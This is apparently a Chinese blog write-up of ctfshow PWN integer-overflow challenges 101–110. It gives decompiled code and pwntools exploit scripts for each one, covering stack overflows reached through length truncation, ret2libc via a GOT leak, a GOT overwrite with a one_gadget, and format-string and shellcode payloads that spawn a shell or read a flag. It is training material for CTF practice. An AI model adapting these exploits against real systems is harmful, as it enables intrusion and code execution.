ctfshow 整数溢出--[101-110]

最新推荐文章于 2025-02-19 23:05:53 发布
最新推荐文章于 2025-02-19 23:05:53 发布
阅读量609 收藏 10
点赞数 4
CC 4.0 BY-SA版权
分类专栏: PWN 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/KaliLinux_V/article/details/144010760

PWN101

int useful()
{
  puts(" ====================================================================================================");
  puts("           Type         |      Byte      |                          Range                            ");
  puts(" ====================================================================================================");
  puts("      short int         |     2 byte     |                  0~0x7fff 0x8000~0xffff                   ");
  puts("   unsigned short int   |     2 byte     |                        0~0xffff                           ");
  puts("          int           |     4 byte     |             0~0x7fffffff 0x80000000~0xffffffff            ");
  puts("    unsigned int        |     4 byte     |                        0~0xffffffff                       ");
  puts("      long int          |     8 byte     | 0~0x7fffffffffffffff 0x8000000000000000~0xffffffffffffffff");
  puts("   unsigned long int    |     8 byte     |                    0~0xffffffffffffffff                   ");
  return puts(" ====================================================================================================");
}

这里的0 ~ 0x7fffffff就是 0~2147483647

0x80000000 ~ 0xffffffff就是 -2147483648 ~ -1

输入

-2147483648 2147483647

PWN102

int __cdecl main(int argc, const char **argv, const char **envp)
{
  unsigned int v4; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v5; // [rsp+8h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  init(argc, argv, envp);
  logo();
  puts("Maybe these help you:");
  useful();
  v4 = 0;
  printf("Enter an unsigned integer: ");
  __isoc99_scanf("%u", &v4);
  if ( v4 == -1 )
    gift();
  else
    printf("Number = %u\n", v4);
  return 0;
}

有符号和无符号比较时,会把有符号转换成无符号类型,-1 对应的二

进制表示为 0xFFFFFFFF,也就是 4294967295

PWN103

输入 0 ,-1

PWN 104

ru(b"How long are you?")
sl(b"-1")
ru(b"Who are you?")
system_addr = 0x40078D

payload = b"a"*(0xe+8)+p64(system_addr)
sl(payload)

PWN105

char *__cdecl ctfshow(char *s)
{
  char dest[8]; // [esp+7h] [ebp-11h] BYREF
  unsigned __int8 v3; // [esp+Fh] [ebp-9h]

  v3 = strlen(s);
  if ( v3 <= 3u || v3 > 8u )
  {
    puts("Authentication failed!");
    exit(-1);
  }
  printf("Authentication successful, Hello %s", s);
  return strcpy(dest, s);
}

这里的v3是int8类型,说明是一个字节大小,对应的二进制范围是0~1111 1111,十进制是0~255,当我们输入的字符串内容长度大于255时又从0开始计算。即256对应大小为0,257对应大小为1,因为v3要大于3小于8,所以我们的长度可以为 260

system = 0x804870E
ru(b"[+] Check your permissions:")

payload = b"a"*(0x11+4)+p32(system)
payload = payload.ljust(260,b"a")
sl(payload)

PWN106

和PWN105一样

ru(b"Your choice:")
sl(b"1")

ru(b"Please input your username:")
sl(b"aaaa")

ru(b"Please input your passwd:")
payload = b"a"*(0x14+4)+p32(0x8048919)
payload = payload.ljust(260,b"a")
sl(payload)

PWN107

输入 -1 即可栈溢出

ru(b"How many bytes do you want me to read? ")
sl(b"-1")

ru(b"bytes of data!\n")

printf_plt = elf.plt['printf']
printf_got = elf.got['printf']
main_ret = elf.sym['main']

payload = b"a"*(0x2c+4)+p32(printf_plt)+p32(main_ret)+p32(printf_got)
sl(payload)
printf_addr = u32(io.recvuntil(b'\xf7')[-4:])
libc = LibcSearcher("printf",printf_addr)
libc_base = printf_addr-libc.dump("printf")
system = libc_base+libc.dump("system")
binsh = libc_base+libc.dump("str_bin_sh")
print("libc_base---------------------->: ",hex(libc_base))

ru(b"How many bytes do you want me to read? ")
sl(b"-1")

ru(b"bytes of data!\n")

payload = b"a"*(0x2c+4)+p32(system)+p32(main_ret)+p32(binsh)
sl(payload)

PWN108

puts函数是一个高级函数,也就是执行这个函数过程中会调用一些其他函数,例如strlen()函数

如图为puts函数汇编代码开头一部分,puts函数又调用了strlen函数,也就是在libc中执行puts函数时,又通过strlen函数的got表跳转到了strlen函数。

我们去劫持strlen函数的got表为one_gadget即可

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  int i; // [rsp+8h] [rbp-28h]
  int j; // [rsp+Ch] [rbp-24h]
  __int64 v6; // [rsp+10h] [rbp-20h]
  char v7[3]; // [rsp+25h] [rbp-Bh] BYREF
  unsigned __int64 v8; // [rsp+28h] [rbp-8h]

  v8 = __readfsqword(0x28u);
  sub_9BA(a1, a2, a3);
  sub_A55();
  puts("Free shooting games! Three bullets available!");
  printf("I placed the target near: %p\n", &puts);
  puts("shoot!shoot!");
  v6 = sub_B78();                //输入我们要打的地址,由于里面有atol函数转化为数字,所以不能用p64,要有str()
  for ( i = 0; i <= 2; ++i )
  {
    puts("biang!");
    read(0, &v7[i], 1uLL);               //接受3个字节
    getchar();
  }
  if ( (unsigned int)sub_BC2(v7) )         //这是个check不允许数组的前两个元素同时为 0xc5 和 0xf2 ,或者 0x22 和0xf3 ,或者 0x8c 和 0xa3简单来说就是限制了gadget:
  {
    for ( j = 0; j <= 2; ++j )
      *(_BYTE *)(j + v6) = v7[j];    //修改指定内存地址的低 3 个字节
  }
  if ( !dlopen(0LL, 1) )               //测试程序是否能够正常使用动态链接功能
    exit(1);
  puts("bye~");                     //会调用strlen
  return 0LL;
}

这里泄露了puts函数的地址,相当于拿到了libc基址。也就是任意地址任意写。

在这里插入图片描述

这里可以拿到j_strlen的偏移是 0x3eb0a8 ,然后打one_gadget

ru(b"I placed the target near: 0x")
puts_addr = int(r(12),16)
libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr-libc.dump("puts")
strlen = libc_base+0x3eb0a8
one_gadget = libc_base+0xe54fe
print("libc_base-----------------_>: ",hex(libc_base))

ru(b"shoot!shoot!")
sl(str(strlen))

for i in range(3):
	ru(b"biang!")
	sl(p8(one_gadget & 0xff))
	one_gadget = one_gadget>>8

PWN109(fmt)

有格式字符串,利用格式字符串来打

from pwn import *
from LibcSearcher import *

context(log_level='debug',arch='i386', os='linux')
# context(log_level='debug',arch='amd64', os='linux')


pwnfile = "./pwn"
# io = remote("pwn.challenge.ctf.show",28276)
io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc/buu_libc-2.23_64.so")


s       = lambda data               :io.send(data)
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
r       = lambda num=4096           :io.recv(num)
ru      = lambda delims		    :io.recvuntil(delims)
itr     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
lg      = lambda address,data       :log.success('%s: '%(address)+hex(data))

def inp(data):
	sla(b"Quit!!!",b"1")
	ru(b"\n")
	sleep(0.3)
	sl(data)

def fmt():
	sla(b"Quit!!!\n",b"2")


payload = b"aaa.%8$p"
inp(payload)

fmt()

ru(b"aaa.0x")
stack_addr = int(r(8),16)
stack_ret = stack_addr-0x24
print("stack_addr-------------->: ",hex(stack_addr))

payload = p32(stack_ret)+p32(stack_ret+2)+b"%"+bytes(str((stack_addr+28)&0xffff),"utf-8")+b"c%16$hn"
payload += b"%"+bytes(str(((stack_addr>>16)&0xffff)-(stack_addr+36)&0xffff),"utf-8")+b"c%17$hn"
payload += b"aa"+asm(shellcraft.sh())

inp(payload)
print("stack_addr-------------->: ",hex(stack_addr))


# gdb.attach(io)
fmt()


itr()

PWN110

泄露栈地址,改返回地址为栈地址,然后写shllcode。

from pwn import *
from LibcSearcher import *

context(log_level='debug',arch='i386', os='linux')
# context(log_level='debug',arch='amd64', os='linux')


pwnfile = "./pwn"
# io = remote("pwn.challenge.ctf.show",28276)
io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc/buu_libc-2.23_64.so")


s       = lambda data               :io.send(data)
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
r       = lambda num=4096           :io.recv(num)
ru      = lambda delims		    :io.recvuntil(delims)
itr     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
lg      = lambda address,data       :log.success('%s: '%(address)+hex(data))

ru(b"1+1= ?\n")
sl(b"-1")

payload = p32(0x804887D)+b"a"*(0x41b)+p32(0x0804887D)
sl(payload)

stack = int(r(8),16)
print("stack--------------->:",hex(stack))

ru(b"1+1= ?\n")
sl(b"-1")

payload = asm(shellcraft.cat('/ctfshow_flag'))
payload = payload.ljust(0x41b+4,b'a')+p32(stack-0x10)
sl(payload)

itr()
CTFshow-PWN-溢出pwn49)两种方法+动调分析
Welcome To Myon'Blog !
06-09 1290
执行后,可以看到 0x80da000 往后部分为可读可写可执行权限。看似开了 canary 保护,实际没有,是 checksec 版本太老了,检测到 __stack_chk_fail 函数就算开了。看似和上一题一模一样,但是细心的小朋友应该注意到了,左边多出了很多函数,说明这个程序是静态链接的,静态链接就意味着没法去打 ret2libc了,还是无 system 无 /bin/sh,考虑打 ret2syscall。
CTFshow-PWN-溢出pwn67-pwn68)nop sled 空操作雪橇-对抗栈帧地址随机化
最新发布
Welcome To Myon'Blog !
07-24 89
摘要:本文分析了32位和64位程序的栈溢出利用方法。程序通过两次输入,第一次写入shellcode到seed变量,第二次输入目标地址到v5变量。关键点在于利用query_position函数返回的随机偏移地址推算seed地址,并通过nopsled技术解决地址随机化问题。文章详细讲解了栈帧偏移计算、nopsled原理、地址填充策略,并提供了32位和64位的完整exp代码。最终通过发送包含nop指令和shellcode的payload,成功获取shell权限。
在命令提示符登录mySQL时,报 (11001)Unknown lySOL server hostloaclhost错误。
Aisaidi的博客
05-14 551
在命令提示符登录mySQL时,报(11001)Unknown lySOL server hostloaclhost错误。
ctfshow--web入门(web101--web115&web123&web125-web133)
qing_chuan_的博客
06-08 1282
v2$v3反射,通俗来讲就是可以通过一个对象来获取所属类的具体内容,php中内置了强大的反射API:ReflectionClass:一个反射类,功能十分强大,内置了各种获取类信息的方法,创建方式为new ReflectionClass(str 类名),可以用echo new ReflectionClass(‘className’)打印类的信息。ReflectionObject:另一个反射类,创建方式为new ReflectionObject(对象名)。
ctfshow we89-101
akxnxbshai的博客
01-18 529
目录 Web 89 Web 90 Web 91 Web 92 Web 93 web 94 Web 95 Web 96 Web 97 Web 98 Web 99 Web 100 Web 101 Web 89 明显需要绕过preg_match() 利用数组绕过: Payload:?num[]=a Web 90 因为intval() 函数返回integer值,所以加小数即可绕过if判断且intval()运算后还为4476 Payload:?num=4
ctfshow-web入门-php特性(web100-web103)is_numeric 函数绕过
Welcome To Myon'Blog !
07-13 1758
我们只需要构造输出 ctfshow 这个类即可。虽然逻辑运算符的优先级比赋值运算符要高,但是如果逻辑运算符和赋值运算符连用时,往往允许存在先进行赋值运算,后再进行逻辑运算的顺序。需要满足 if 语句才会进入后面的判断,因此要求 v0 为 1,这里用的是 and,所以只需要满足 v1是数字即可。要求 v2 中不能有分号,v3 中需要有分号。如果上述要求都满足,则会调用 eval 函数。代入 eval 函数实际就是执行:");
ctfshow-web101(php特性)
m0_62094846的博客
01-14 737
反射类ReflectionClass <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-22 00:26:48 # @link: https://ctfer.com */ highlight_file(__FILE__); include("ctfshow.php")
CTFshow-PWN入门-溢出pwn41~pwn48
weixin_63576152的博客
08-25 2431
本文主要详解CTFshowpwn入门系列的栈溢出模块的其中x题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope以下操作中小编用的都是自己的kali环境。
CTFshow-PWN入门-前置基础-全篇
weixin_63576152的博客
07-31 5508
本文主要详解CTFshowpwn入门系列的前置基础模块,共30道题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope的博客以下操作中小编用的都是自己的kali环境。
ctfshow刷题笔记—栈溢出pwn53~pwn56
Yilanchia的博客
02-19 777
它先循环读取,每次一个字节,直到读取到换行符(ascll:10 0xa),循环读取才会结束,__isoc99_sscanf(v2,”%d”,&nbytes)这个函数从v2中读取一个整数,存放到nbytes变量中,这个变量决定了我们能够向buf写入的数据大小,我们想要造成溢出,这个数据就需要大一点,接下来,就去比较s1与global_canary是否相同,相同这个函数才能正常返回,造成溢出。,应该需要找到flag之间的关系。主要是提示用户输入数据,输出欢迎信息并让用户输入密码,进行比较,以便执行flag。
CTFSHOW PHP特性篇(上篇 89-110
羽的博客
10-21 6142
web89 if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 考察点:数组绕过正则表达式 官方文档中如下介绍 返回值 返回完整匹配次数(可能是0),或者如果发生错误返回FALSE。 也就是说如果我们不按规定传一个字符串,
php整数溢出 ctf,CTF 两道web整数溢出题目(猫咪银行和ltshop)
weixin_39644614的博客
03-26 1346
①猫咪银行: (2018中科大hackgame) 一开始给十个CTB,而flag需要20个CTB,我们需要理财赚够20个。理财是只能买入TDSU才可以获得收益。我们先上来直接把CTB全部换成TDSU。 上边是我们花了所有TDSU:66060买了19分钟后的收益。(因为一个账号最多存在20分钟,计算你用脚本极限也不能买20分钟,必须留一分钟用来换TDSU和买入,取出等操作)还是不行,算上收益的钱12...
从一道CTF题看整数溢出
csd_ct的专栏
06-07 1797
整数溢出漏洞是程序开发过程中危害较大的一种漏洞,经常是PWN中各大神的突破点,利用此跳板,攻入系统,进而攻陷真个系统。此类漏洞不容易发觉,也不容易引起编程人员的注意。 近期在研究“网鼎杯2020白虎组”的比赛试题中,有一道RE逆向题目-“恶龙”,涉及到整数溢出,如利用此漏洞,可快速拿到Flag。本题解题思路有多种,详见 https://blog.youkuaiyun.com/Palmer9/article/details/106117208/,这篇博客中有详细的解释。网上大多数的解法是,动...
CTFshow php特性 web101
Kradress的博客
12-14 869
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-22 00:26:48 # @link: https://ctfer.com */ highlight_file(__FILE__); include("ctfshow.php"); //fl
buuctf pwn (第三波)学会利用整数溢出
月阴荒的博客
04-04 831
bjdctf_2020_babystack2 https://www.cnblogs.com/bhxdn/p/12331035.html
安全漏洞--整数溢出漏洞(IOV)分析
热门推荐
关注互联网安全的小虾米一枚
04-19 1万+
一 漏洞简介         整数溢出漏洞(integer overflow):在计算机中,整数分为无符号整数以及有符号整数两种。其中有符号整数会在最高位用0表示正数,用1表示负数,而无符号整数则没有这种限制。另外,我们常见的整数类型有8位(单字节字符、布尔类型)、16位(短整型)、32位(长整型)等。关于整数溢出,其实它与其它类型的溢出一样,都是将数据放入了比它本身小的存储空间中,从而出现了溢出。由此引发的一切程序漏洞都
这一篇,带你敲开C语言指针的大门
Serendipper_constancy的博客
02-24 1847
今天萌新博主打算写几篇关于C语言就指针方面的学习文案,因为萌新博主也是一位在校大学生,专业课也涉及到C语言,在学习C语言——指针的时候,相信和大家一样,在这块知识面感觉晦涩难懂,很抽象,怎么学也学不会,学不好。但是博主并没有放弃,因为指针这块是C语言的灵魂,多么具有挑战性啊!所以热心的博主想帮助大家,前车之覆,后车之鉴,我们一起来学习指针,有不足的地方,还请大家多多批评指正! —————————废...
CTFSHOW~信息收集(10~20)
ing_end的博客
01-28 2293
WEB~10 题目:cookie 只是一块饼干,不能存放任何隐私数据 我们直接查看cookies 使用burp进行url解码 WEB~11 根据提示 解析域名 WEB~12 题目:有时候网站上的公开信息,就是管理员常用密码 我们访问url/admin页面,得到flag Admin是什么 admin是administer的缩写,也就是说,它是一个管理员账号,对于每一台电脑ip来说,...
DDCTF-xpwn-格式化字符串,整数溢出,劫持函数
playmaker的博客
04-22 470
首先查看保护 放入IDA中查看主函数 int __cdecl main(int a1) { int v1; // eax char buf; // [esp+0h] [ebp-4Ch] size_t nbytes; // [esp+40h] [ebp-Ch] int *v5; // [esp+44h] [ebp-8h] v5 = &a1; setbuf(stdo...
ctfshow web3
01-23
### CTFShow Web3 挑战及解题思路 #### 关于CTFShow平台的特点 CTFShow是一个提供多种信息安全挑战的在线平台,旨在帮助参与者提升技能并积累经验。该平台上不仅有常规的信息安全竞赛题目,还有专门针对不同技术领域设计的任务,比如Web应用安全测试等[^1]。 #### Web3挑战概述 对于Web3类型的挑战,在CTFShow上通常会涉及到区块链技术和智能合约的安全审计方面的问题。这类问题可能包括但不限于: - 发现和利用智能合约中的逻辑漏洞; - 对抗基于去中心化应用程序(DApps)的身份验证机制; - 处理加密货币交易过程中的安全隐患。 #### 解决方案的一般方法论 当面对一个具体的Web3挑战时,可以遵循如下策略来寻找解决方案: ##### 分析给定材料 仔细阅读题目描述以及任何附加文件或提示信息,理解目标环境的具体情况及其工作原理。这一步骤有助于确定攻击面所在位置,并为后续步骤奠定基础。 ##### 探索潜在弱点 通过查阅官方文档或其他权威资料了解所使用的框架和技术栈特性,识别其中可能存在风险的地方。例如,在Solidity编写过程中容易犯下的错误像整数溢出、重入等问题都可能是突破口之一。 ##### 利用现有工具辅助分析 借助专业的静态代码审查软件(如Mythril)、动态调试器(Remix IDE内置功能),甚至是一些自动化渗透测试套件来进行更深入的研究。这些工具有助于快速定位可疑之处并验证假设的有效性[^3]。 ##### 实施针对性措施 一旦确认了某个特定缺陷,则可以根据实际情况采取相应的行动——无论是构造特制输入触发异常行为还是绕过某些保护机制实现未授权操作。值得注意的是,在实际比赛中应当始终遵守主办方设定的比赛规则,不得从事非法活动。 ```python # 这里仅作为示例展示如何使用Python脚本与以太坊交互 from web3 import Web3, HTTPProvider infura_url = "https://mainnet.infura.io/v3/YOUR_INFURA_PROJECT_ID" web3 = Web3(HTTPProvider(infura_url)) contract_address = '0xYourContractAddress' abi = [...] # 合约ABI定义 contract_instance = web3.eth.contract(address=contract_address, abi=abi) # 调用合约函数... result = contract_instance.functions.someFunction().call() print(result) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

saulgoodman-q

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值